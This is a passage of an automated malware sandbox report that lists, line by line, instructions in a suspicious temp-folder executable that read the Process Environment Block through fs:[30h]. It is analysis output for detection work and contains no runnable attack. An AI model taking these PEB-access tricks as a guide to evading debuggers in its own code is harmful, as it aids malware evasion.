          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016405A7 mov eax, dword ptr fs:[00000030h]4_2_016405A7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016405A7 mov eax, dword ptr fs:[00000030h]4_2_016405A7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F4588 mov eax, dword ptr fs:[00000030h]4_2_015F4588
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C2582 mov eax, dword ptr fs:[00000030h]4_2_015C2582
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C2582 mov ecx, dword ptr fs:[00000030h]4_2_015C2582
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E45B1 mov eax, dword ptr fs:[00000030h]4_2_015E45B1
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E45B1 mov eax, dword ptr fs:[00000030h]4_2_015E45B1
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E245A mov eax, dword ptr fs:[00000030h]4_2_015E245A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164C460 mov ecx, dword ptr fs:[00000030h]4_2_0164C460
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015B645D mov eax, dword ptr fs:[00000030h]4_2_015B645D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]4_2_015FE443
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]4_2_015FE443
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]4_2_015FE443
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]4_2_015FE443
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]4_2_015FE443
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]4_2_015FE443
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]4_2_015FE443
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FE443 mov eax, dword ptr fs:[00000030h]4_2_015FE443
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EA470 mov eax, dword ptr fs:[00000030h]4_2_015EA470
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EA470 mov eax, dword ptr fs:[00000030h]4_2_015EA470
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EA470 mov eax, dword ptr fs:[00000030h]4_2_015EA470
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0167A456 mov eax, dword ptr fs:[00000030h]4_2_0167A456
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]4_2_01646420
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]4_2_01646420
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]4_2_01646420
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]4_2_01646420
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]4_2_01646420
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]4_2_01646420
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01646420 mov eax, dword ptr fs:[00000030h]4_2_01646420
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F8402 mov eax, dword ptr fs:[00000030h]4_2_015F8402
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F8402 mov eax, dword ptr fs:[00000030h]4_2_015F8402
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F8402 mov eax, dword ptr fs:[00000030h]4_2_015F8402
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FA430 mov eax, dword ptr fs:[00000030h]4_2_015FA430
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BE420 mov eax, dword ptr fs:[00000030h]4_2_015BE420
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BE420 mov eax, dword ptr fs:[00000030h]4_2_015BE420
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BE420 mov eax, dword ptr fs:[00000030h]4_2_015BE420
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BC427 mov eax, dword ptr fs:[00000030h]4_2_015BC427
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C04E5 mov ecx, dword ptr fs:[00000030h]4_2_015C04E5
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164A4B0 mov eax, dword ptr fs:[00000030h]4_2_0164A4B0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F44B0 mov ecx, dword ptr fs:[00000030h]4_2_015F44B0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C64AB mov eax, dword ptr fs:[00000030h]4_2_015C64AB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0167A49A mov eax, dword ptr fs:[00000030h]4_2_0167A49A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C0750 mov eax, dword ptr fs:[00000030h]4_2_015C0750
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F674D mov esi, dword ptr fs:[00000030h]4_2_015F674D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F674D mov eax, dword ptr fs:[00000030h]4_2_015F674D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F674D mov eax, dword ptr fs:[00000030h]4_2_015F674D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C8770 mov eax, dword ptr fs:[00000030h]4_2_015C8770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]4_2_015D0770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]4_2_015D0770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]4_2_015D0770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]4_2_015D0770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]4_2_015D0770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]4_2_015D0770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]4_2_015D0770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]4_2_015D0770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]4_2_015D0770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]4_2_015D0770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]4_2_015D0770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D0770 mov eax, dword ptr fs:[00000030h]4_2_015D0770
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602750 mov eax, dword ptr fs:[00000030h]4_2_01602750
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602750 mov eax, dword ptr fs:[00000030h]4_2_01602750
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01644755 mov eax, dword ptr fs:[00000030h]4_2_01644755
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164E75D mov eax, dword ptr fs:[00000030h]4_2_0164E75D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C0710 mov eax, dword ptr fs:[00000030h]4_2_015C0710
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F0710 mov eax, dword ptr fs:[00000030h]4_2_015F0710
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163C730 mov eax, dword ptr fs:[00000030h]4_2_0163C730
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FC700 mov eax, dword ptr fs:[00000030h]4_2_015FC700
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F273C mov eax, dword ptr fs:[00000030h]4_2_015F273C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F273C mov ecx, dword ptr fs:[00000030h]4_2_015F273C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F273C mov eax, dword ptr fs:[00000030h]4_2_015F273C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FC720 mov eax, dword ptr fs:[00000030h]4_2_015FC720
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FC720 mov eax, dword ptr fs:[00000030h]4_2_015FC720
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164E7E1 mov eax, dword ptr fs:[00000030h]4_2_0164E7E1
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CC7C0 mov eax, dword ptr fs:[00000030h]4_2_015CC7C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C47FB mov eax, dword ptr fs:[00000030h]4_2_015C47FB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C47FB mov eax, dword ptr fs:[00000030h]4_2_015C47FB
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016407C3 mov eax, dword ptr fs:[00000030h]4_2_016407C3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E27ED mov eax, dword ptr fs:[00000030h]4_2_015E27ED
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E27ED mov eax, dword ptr fs:[00000030h]4_2_015E27ED
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E27ED mov eax, dword ptr fs:[00000030h]4_2_015E27ED
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016747A0 mov eax, dword ptr fs:[00000030h]4_2_016747A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166678E mov eax, dword ptr fs:[00000030h]4_2_0166678E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C07AF mov eax, dword ptr fs:[00000030h]4_2_015C07AF
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168866E mov eax, dword ptr fs:[00000030h]4_2_0168866E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168866E mov eax, dword ptr fs:[00000030h]4_2_0168866E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DC640 mov eax, dword ptr fs:[00000030h]4_2_015DC640
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F2674 mov eax, dword ptr fs:[00000030h]4_2_015F2674
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FA660 mov eax, dword ptr fs:[00000030h]4_2_015FA660
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FA660 mov eax, dword ptr fs:[00000030h]4_2_015FA660
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]4_2_015D260B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]4_2_015D260B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]4_2_015D260B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]4_2_015D260B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]4_2_015D260B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]4_2_015D260B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D260B mov eax, dword ptr fs:[00000030h]4_2_015D260B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163E609 mov eax, dword ptr fs:[00000030h]4_2_0163E609
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C262C mov eax, dword ptr fs:[00000030h]4_2_015C262C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01602619 mov eax, dword ptr fs:[00000030h]4_2_01602619
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015DE627 mov eax, dword ptr fs:[00000030h]4_2_015DE627
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F6620 mov eax, dword ptr fs:[00000030h]4_2_015F6620
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F8620 mov eax, dword ptr fs:[00000030h]4_2_015F8620
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163E6F2 mov eax, dword ptr fs:[00000030h]4_2_0163E6F2
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163E6F2 mov eax, dword ptr fs:[00000030h]4_2_0163E6F2
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163E6F2 mov eax, dword ptr fs:[00000030h]4_2_0163E6F2
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163E6F2 mov eax, dword ptr fs:[00000030h]4_2_0163E6F2
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016406F1 mov eax, dword ptr fs:[00000030h]4_2_016406F1
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016406F1 mov eax, dword ptr fs:[00000030h]4_2_016406F1
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FA6C7 mov ebx, dword ptr fs:[00000030h]4_2_015FA6C7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FA6C7 mov eax, dword ptr fs:[00000030h]4_2_015FA6C7
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C4690 mov eax, dword ptr fs:[00000030h]4_2_015C4690
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C4690 mov eax, dword ptr fs:[00000030h]4_2_015C4690
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F66B0 mov eax, dword ptr fs:[00000030h]4_2_015F66B0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FC6A6 mov eax, dword ptr fs:[00000030h]4_2_015FC6A6
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0160096E mov eax, dword ptr fs:[00000030h]4_2_0160096E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0160096E mov edx, dword ptr fs:[00000030h]4_2_0160096E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0160096E mov eax, dword ptr fs:[00000030h]4_2_0160096E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164C97C mov eax, dword ptr fs:[00000030h]4_2_0164C97C
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01664978 mov eax, dword ptr fs:[00000030h]4_2_01664978
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01664978 mov eax, dword ptr fs:[00000030h]4_2_01664978
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01640946 mov eax, dword ptr fs:[00000030h]4_2_01640946
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01694940 mov eax, dword ptr fs:[00000030h]4_2_01694940
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E6962 mov eax, dword ptr fs:[00000030h]4_2_015E6962
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E6962 mov eax, dword ptr fs:[00000030h]4_2_015E6962
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E6962 mov eax, dword ptr fs:[00000030h]4_2_015E6962
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015B8918 mov eax, dword ptr fs:[00000030h]4_2_015B8918
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015B8918 mov eax, dword ptr fs:[00000030h]4_2_015B8918
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164892A mov eax, dword ptr fs:[00000030h]4_2_0164892A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0165892B mov eax, dword ptr fs:[00000030h]4_2_0165892B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163E908 mov eax, dword ptr fs:[00000030h]4_2_0163E908
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0163E908 mov eax, dword ptr fs:[00000030h]4_2_0163E908
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164C912 mov eax, dword ptr fs:[00000030h]4_2_0164C912
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164E9E0 mov eax, dword ptr fs:[00000030h]4_2_0164E9E0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA9D0 mov eax, dword ptr fs:[00000030h]4_2_015CA9D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA9D0 mov eax, dword ptr fs:[00000030h]4_2_015CA9D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA9D0 mov eax, dword ptr fs:[00000030h]4_2_015CA9D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA9D0 mov eax, dword ptr fs:[00000030h]4_2_015CA9D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA9D0 mov eax, dword ptr fs:[00000030h]4_2_015CA9D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015CA9D0 mov eax, dword ptr fs:[00000030h]4_2_015CA9D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F49D0 mov eax, dword ptr fs:[00000030h]4_2_015F49D0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016569C0 mov eax, dword ptr fs:[00000030h]4_2_016569C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F29F9 mov eax, dword ptr fs:[00000030h]4_2_015F29F9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F29F9 mov eax, dword ptr fs:[00000030h]4_2_015F29F9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168A9D3 mov eax, dword ptr fs:[00000030h]4_2_0168A9D3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016489B3 mov esi, dword ptr fs:[00000030h]4_2_016489B3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016489B3 mov eax, dword ptr fs:[00000030h]4_2_016489B3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016489B3 mov eax, dword ptr fs:[00000030h]4_2_016489B3
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C09AD mov eax, dword ptr fs:[00000030h]4_2_015C09AD
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C09AD mov eax, dword ptr fs:[00000030h]4_2_015C09AD
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]4_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]4_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]4_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]4_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]4_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]4_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]4_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]4_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]4_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]4_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]4_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]4_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D29A0 mov eax, dword ptr fs:[00000030h]4_2_015D29A0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C4859 mov eax, dword ptr fs:[00000030h]4_2_015C4859
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C4859 mov eax, dword ptr fs:[00000030h]4_2_015C4859
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015F0854 mov eax, dword ptr fs:[00000030h]4_2_015F0854
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01656870 mov eax, dword ptr fs:[00000030h]4_2_01656870
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01656870 mov eax, dword ptr fs:[00000030h]4_2_01656870
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164E872 mov eax, dword ptr fs:[00000030h]4_2_0164E872
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164E872 mov eax, dword ptr fs:[00000030h]4_2_0164E872
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015D2840 mov ecx, dword ptr fs:[00000030h]4_2_015D2840
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166483A mov eax, dword ptr fs:[00000030h]4_2_0166483A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166483A mov eax, dword ptr fs:[00000030h]4_2_0166483A
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E2835 mov eax, dword ptr fs:[00000030h]4_2_015E2835
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E2835 mov eax, dword ptr fs:[00000030h]4_2_015E2835
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E2835 mov eax, dword ptr fs:[00000030h]4_2_015E2835
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E2835 mov ecx, dword ptr fs:[00000030h]4_2_015E2835
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E2835 mov eax, dword ptr fs:[00000030h]4_2_015E2835
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015E2835 mov eax, dword ptr fs:[00000030h]4_2_015E2835
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FA830 mov eax, dword ptr fs:[00000030h]4_2_015FA830
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164C810 mov eax, dword ptr fs:[00000030h]4_2_0164C810
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168A8E4 mov eax, dword ptr fs:[00000030h]4_2_0168A8E4
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015EE8C0 mov eax, dword ptr fs:[00000030h]4_2_015EE8C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FC8F9 mov eax, dword ptr fs:[00000030h]4_2_015FC8F9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015FC8F9 mov eax, dword ptr fs:[00000030h]4_2_015FC8F9
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_016908C0 mov eax, dword ptr fs:[00000030h]4_2_016908C0
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015C0887 mov eax, dword ptr fs:[00000030h]4_2_015C0887
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0164C89D mov eax, dword ptr fs:[00000030h]4_2_0164C89D
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015B8B50 mov eax, dword ptr fs:[00000030h]4_2_015B8B50
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01668B42 mov eax, dword ptr fs:[00000030h]4_2_01668B42
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01656B40 mov eax, dword ptr fs:[00000030h]4_2_01656B40
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01656B40 mov eax, dword ptr fs:[00000030h]4_2_01656B40
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_015BCB7E mov eax, dword ptr fs:[00000030h]4_2_015BCB7E
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0168AB40 mov eax, dword ptr fs:[00000030h]4_2_0168AB40
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01674B4B mov eax, dword ptr fs:[00000030h]4_2_01674B4B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01674B4B mov eax, dword ptr fs:[00000030h]4_2_01674B4B
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_0166EB50 mov eax, dword ptr fs:[00000030h]4_2_0166EB50
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01692B57 mov eax, dword ptr fs:[00000030h]4_2_01692B57
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01692B57 mov eax, dword ptr fs:[00000030h]4_2_01692B57
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01692B57 mov eax, dword ptr fs:[00000030h]4_2_01692B57
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01692B57 mov eax, dword ptr fs:[00000030h]4_2_01692B57
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_01688B28 mov eax, dword ptr fs:[00000030h]4_2_01688B28
